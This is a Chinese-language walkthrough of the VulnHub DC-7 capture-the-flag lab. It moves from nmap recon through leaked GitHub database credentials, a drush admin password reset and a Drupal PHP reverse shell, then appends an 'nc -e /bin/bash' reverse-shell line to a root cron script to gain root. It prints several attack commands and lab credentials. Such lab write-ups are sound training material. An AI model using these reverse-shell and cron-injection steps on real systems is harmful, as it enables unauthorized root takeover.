vulnhub——DC:7

信息收集

┌──(root㉿anla)-[~]                                                                                                                                         
└─# arp-scan -l                                                                                                                                             
	Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245                                                                                
	Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)                                                                              
	192.168.155.53  0a:0d:b0:31:80:4e       (Unknown: locally administered)                                                                                     
	192.168.155.227 30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.                                                                        
	192.168.155.230 08:00:27:70:30:17       PCS Systemtechnik GmbH                                                                                              
	                                                                                                                                                            
	10 packets received by filter, 0 packets dropped by kernel                                                                                                  
	Ending arp-scan 1.10.0: 256 hosts scanned in 2.150 seconds (119.07 hosts/sec). 3 responded                                                                  
	                                                                                                                                                            
┌──(root㉿anla)-[~]                                                                                                                                         
└─# nmap 192.168.155.230
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 01:16 EDT                                                                                          
	Nmap scan report for 192.168.155.230                                                                                                                        
	Host is up (0.000061s latency).                                                                                                                             
	Not shown: 998 closed tcp ports (reset)                                                                                                                     
	PORT   STATE SERVICE                                                                                                                                        
	22/tcp open  ssh                                                                                                                                            
	80/tcp open  http                                                                                                                                           
	MAC Address: 08:00:27:70:30:17 (Oracle VirtualBox virtual NIC)                                                                                              
	                                                                                                                                                            
	Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds                                                                                                 
	                                                                                                                                                            
┌──(root㉿anla)-[~]                                                                                                                                         
└─# nmap -T4 -sS -p- -A 192.168.155.230                                                                                                                     
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 01:16 EDT                                                                                          
	Nmap scan report for 192.168.155.230                                                                                                                        
	Host is up (0.00017s latency).                                                                                                                              
	Not shown: 65533 closed tcp ports (reset)                                                                                                                   
	PORT   STATE SERVICE VERSION                                                                                                                                
	22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                                                                                          
	| ssh-hostkey:                                                                                                                                              
	|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)                                                                                              
	|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)                                                                                             
	|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)                                                                                           
	80/tcp open  http    Apache httpd 2.4.25 ((Debian))                                                                                                         
	|_http-generator: Drupal 8 (https://www.drupal.org)                                                                                                         
	|_http-server-header: Apache/2.4.25 (Debian)                                                                                                                
	|_http-title: Welcome to DC-7 | D7                                                                                                                          
	| http-robots.txt: 22 disallowed entries (15 shown)                                                                                                         
	| /core/ /profiles/ /README.txt /web.config /admin/                                                                                                         
	| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/                                                                                          
	| /user/password/ /user/login/ /user/logout/ /index.php/admin/                                                                                              
	|_/index.php/comment/reply/                                                                                                                                 
	MAC Address: 08:00:27:70:30:17 (Oracle VirtualBox virtual NIC)                                                                                              
	Device type: general purpose                                                                                                                                
	Running: Linux 3.X|4.X                                                                                                                                      
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4                                                                                             
	OS details: Linux 3.2 - 4.9                                                                                                                                 
	Network Distance: 1 hop                                                                                                                                     
	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
	
	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.17 ms 192.168.155.230
	
	OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds

Penetration

1、通过web服务获取低权限用户shell

访问80的web服务

# Welcome to DC-7

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box.  :-)

欢迎来到DC-7

DC-7引入了一些“新”概念,但我将留给你自己去发现它们是什么。 :-)

虽然这个挑战并不那么技术性,但如果你需要诉诸于暴力破解或字典攻击,你可能不会成功。

你需要做的,是“跳出”盒子来思考。

要“远远”地跳出盒子来思考。 :-)

百度搜索页面最下方看到的“@DC7USER”,发现是GitHub的一个项目

staffdb

This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.

This isn't a flag, btw, but if you have made it here, well done anyway. :-)

staffdb

这是DC-7挑战中的一些“代码”(是的,这不是最棒的代码,但这不是重点)。

顺便说一句,这不是一个标志,但如果你已经来到这里,无论如何都做得很好。 :-)

git clone https://github.com/Dc7User/staffdb,查看文件中的config.php

└─# cat config.php 
<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

但是……目标没开mysql服务,试试ssh

└─# ssh dc7user@192.168.155.230                                                                                                                             
The authenticity of host '192.168.155.230 (192.168.155.230)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.155.230' (ED25519) to the list of known hosts.
dc7user@192.168.155.230's password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$ 

尝试suid提权无果

dc7user@dc-7:~/backups$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
dc7user@dc-7:~/backups$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/ping
/bin/umount
/bin/mount
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
dc7user@dc-7:~/backups$ sudo -l
-bash: sudo: command not found

2、通过文件信息获取提权方法

在当前目录下的mbox发现会以root权限定时执行/opt/scripts/backups.sh

/opt/scripts/backups.sh

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3LCo-0000Eb-02
	for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

意思大概是:

这段文本是一个电子邮件通知,具体是由系统上的cron守护程序(定时任务)发送的。当cron定时任务执行某个脚本(在这个例子中是/opt/scripts/backups.sh)时,它可能产生输出或错误,cron守护程序会将这些输出或错误作为电子邮件发送。

以下是这段文本的详细解释:

  1. 邮件头信息

    • From: 发件人是root@dc-7,这意味着任务是由root用户执行的。
    • To: 收件人也是root@dc-7,因此这封邮件是发送给系统管理员的。
    • Subject: 主题表明这是一个cron作业,执行了/opt/scripts/backups.sh脚本。
    • 日期和时间: 邮件发送的时间是Fri, 30 Aug 2019 00:15:18 +1000
  2. 邮件内容

    • rm命令错误:
    bash`rm: cannot remove '/home/dc7user/backups/*': No such file or directory`
    

    这表示脚本试图删除/home/dc7user/backups/目录下的所有文件,但是该目录或文件不存在。

    • 数据库备份成功:
    bash`Database dump saved to /home/dc7user/backups/website.sql [success]`
    

    这表示尽管在删除备份文件时遇到了问题,但数据库已成功备份到/home/dc7user/backups/website.sql

  3. Cron环境变量:

    • 这些X-Cron-Env行显示了cron作业执行时的环境变量。例如,PATHSHELLHOMELOGNAME都是系统环境变量,它们定义了作业如何执行。

backups.sh

查看backups.sh

dc7user@dc-7:~$ cat /opt/scripts/backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

大概意思是:
这个脚本/opt/scripts/backups.sh看起来是用来备份网站数据库和文件的。以下是对这个脚本的逐行解释:

#!/bin/bash

这一行是shebang,它告诉系统使用/bin/bash来执行这个脚本。

rm /home/dc7user/backups/*

这行命令会删除/home/dc7user/backups/目录下所有的文件和目录。如果目录不存在,你会收到一个错误消息,就像你在电子邮件通知中看到的那样。

cd /var/www/html/

这行命令将当前工作目录切换到/var/www/html/,这通常是web服务器的根目录。

drush sql-dump --result-file=/home/dc7user/backups/website.sql

这行命令使用drush(可能是Drupal的一个命令行工具)来导出数据库,并将结果保存到/home/dc7user/backups/website.sql。注意,这里可能存在一个拼写错误,通常是drush还是drush取决于你的系统安装的是什么。

cd ..

这行命令将当前工作目录切换回上一级目录,也就是/var/www/

tar -czf /home/dc7user/backups/website.tar.gz html/

这行命令创建一个名为website.tar.gz的压缩归档文件,包含html/目录的内容。

gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql

这行命令使用GPG(GNU Privacy Guard)对数据库备份文件website.sql进行对称加密,使用指定的密码PickYourOwnPassword--pinentry-mode loopback选项用于在脚本中提供密码,而不是交互式地提示用户输入。

gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz

与上一行类似,这行命令对归档文件website.tar.gz进行对称加密。

chown dc7user:dc7user /home/dc7user/backups/*

这行命令将/home/dc7user/backups/目录下所有文件和目录的所有权更改为dc7user用户和dc7user组。

rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

最后两行命令删除未加密的备份文件website.sqlwebsite.tar.gz,因为它们已经被加密并保存在相同的目录中。

利用

补充:
drush是一个shell接口,用于从云服务器命令行管理Drupal。
需要在 drupal web目录执行(/var/www/[drupal_folder_name])

由于脚本执行是root权限,所以只要把反弹shell命令写入该脚本即可得到root权限。使用ls -al可以知道www-data用户即网站用户对该脚本具有写入权限。所以现在需要拿到网站的反弹shell。

查阅drush相关命令得知drush user-password 用户名 --password="密码"可以修改密码。drupal网站的有默认管理员用户为admin

dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin 

网页登录admin,在content下可以添加新页面,但是没有PHP code选项。搜索了解到Drupal 8将PHP Filter移除了,让有需求的用户手动安装

访问https://www.drupal.org/project/php/releases/8.x-1.1下载tar.gz类型的包,在Extend模块下进行安装并启用,回到Content模块新建页面写入<?php phpinfo(); ?>,保存后显示了phpinfo页面。

反弹shell使用php的php-reverse-shell(PHP反向外壳),更改一下ip、port即可

┌──(root㉿anla)-[~/staffdb]
└─# nc -lvvp 1234                                                                                                                                           
listening on [any] 1234 ...
192.168.155.230: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.230] 33192
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 23:10:50 up  1:20,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 
Argument expected for the -c option
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-7:/$ ls
ls
bin   etc        initrd.img.old  lost+found  opt   run   sys  var
boot  home       lib              media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old
www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

往脚本内写入反弹shell,监听相关端口等待一段挺长的时间后定时任务触发,拿到权限(我这里用了同样的端口所以得先退出当前www-data的shell)

www-data@dc-7:/$ echo 'nc -e /bin/bash 192.168.155.245 1234'>>/opt/scripts/backups.sh
<bash 192.168.155.245 1234'>>/opt/scripts/backups.sh
www-data@dc-7:/$ cat /opt/scripts/backups.sh
cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
nc -e /bin/bash 192.168.155.245 1234
www-data@dc-7:/$ ^C sent 161, rcvd 1455

┌──(root㉿anla)-[~/staffdb]
└─# nc -lvvp 1234                                                                                                                                           
listening on [any] 1234 ...
192.168.155.230: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.230] 33194
python -c 'import pty; pty.spawn("/bin/bash")'
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dc-7:/var/www# cd /root    
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt         
cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

祝贺!!!

希望你喜欢 DC-7。在此,我想向所有提供反馈的人,以及那些花时间完成这些挑战的人表示衷心的感谢。

我要特别感谢以下几位:

@4nqr34z

@D4mianWayne

@0xmzfr

@theart42

如果你喜欢这次 CTF,请通过 @DCAU7 给我发送推文。
root@dc-7:~# 

  • 17
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值